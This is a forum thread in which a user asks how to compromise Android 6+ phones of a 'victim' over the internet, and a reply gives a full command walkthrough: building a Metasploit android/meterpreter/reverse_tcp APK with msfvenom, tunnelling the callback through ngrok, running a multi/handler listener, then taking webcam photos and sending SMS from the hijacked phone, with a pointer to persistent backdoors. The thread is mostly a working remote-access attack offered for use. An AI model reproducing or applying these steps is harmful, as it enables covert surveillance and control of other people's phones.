[Question] Android hacking (via payload)


Benny639

Hi there! I was hacking Android 5 and 4 with Evil-Droid and sometimes with Metasploit, but now, for hacking Android 6 and higher, I can't manage to get a strong Meterpreter session from the victim. The Meterpreter session opens and closes immediately (possibly due to Android 6 and higher having more security). Please guide me on how I can hack Android 6 and higher smoothly. If you have any other good way to hack Android over WAN, then please let me know. Thank you!


Hi Benny!

^_^ Nice to meet you. I am a big Hak5 fan, myself. Shout out to Kitchen and the team!

I am interested in the same topic, and spent a lot of time this week making it all real.

Here is a summary of what I did to pwn my Android phone via my other Android phone:

1) Download Termux from the Google Play Store.

2) pkg install wget curl python git openssh

3) git clone https://github.com/rapid7/metasploit-framework

4) cd metasploit-framework

5) bundle install (takes about 5 minutes)

6) Go to

https://dashboard.ngrok.com/user/signup

and register for free port forwarding.

7) git clone https://github.com/inconshreveable/ngrok

8) cd ngrok

9) ./ngrok authtoken (your ngrok token), a one-time deal

10) ping 0.tcp.ngrok.io (get the ngrok IP address)

11) ./ngrok tcp 4564

12) Open a new window session.

Slide your thumb to the right. Termux offers a new session. In the new session, cd metasploit-framework.

13) ./msfvenom -p android/meterpreter/reverse_tcp LHOST=(IP from step 10) LPORT=(random port ngrok printed in step 11) R> /sdcard/lolz.apk

This creates the payload in the root directory on the Android phone.

14) ./msfconsole

15) msf> use exploit/multi/handler

msf> set payload android/meterpreter/reverse_tcp

msf> set LHOST localhost

msf> set LPORT 4564

msf> exploit -j -z

16) Run the lolz.apk payload on the other phone.

Ngrok is waiting for the session. Mad waiting for the session.

Voilà! Once it connects,

Type sessions -i 1 and see Meterpreter.

Type help for commands.

Type <command> -h for help with a command.

webcam_snap -i 2 -p /sdcard/selfy.jpg

send_sms -d 2149711234 -t "what's up Darren :)"

Commands here:

https://gist.github.com/mataprasad/c5dd39154a852cdc67ff7958e0a82699

The connection persists only as long as they are not rebooted. To make a persistent shell, see this article:

https://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-kali-linux-0161280/

Man, you're good to pwn.

I also recommend:

git clone https://github.com/Rajkumrdusad/Tool-X

200 Kali tools for Termux!!

I love this prog.

Please note: the ngrok port changes randomly, so your payload must match.

I haven't used Evil-Droid, so maybe you know?

- คςเ๔ кɭ๏ฬภ

 

 


There are plenty of YouTube videos on how to do this. The above post summarises the process pretty well too.

Technically speaking, you don't need ngrok to handle connections over WAN. You just need to add port forwarding rules on your router to direct traffic to your local listener/server address.

As for your closing connections, that could be for any number of reasons, including firewall rules blocking incoming/outgoing traffic on certain ports, misconfigured payloads, etc. I don't use Android phones anymore, so I haven't tested this on any new phones to confirm whether new security policies are the issue.

Edited by icarus255
Inappropriate suggestion

On 10/14/2018 at 5:03 AM, acid klown said:

Here is a summary of what I did to pwn my Android phone via my other Android phone:

[...]

A+
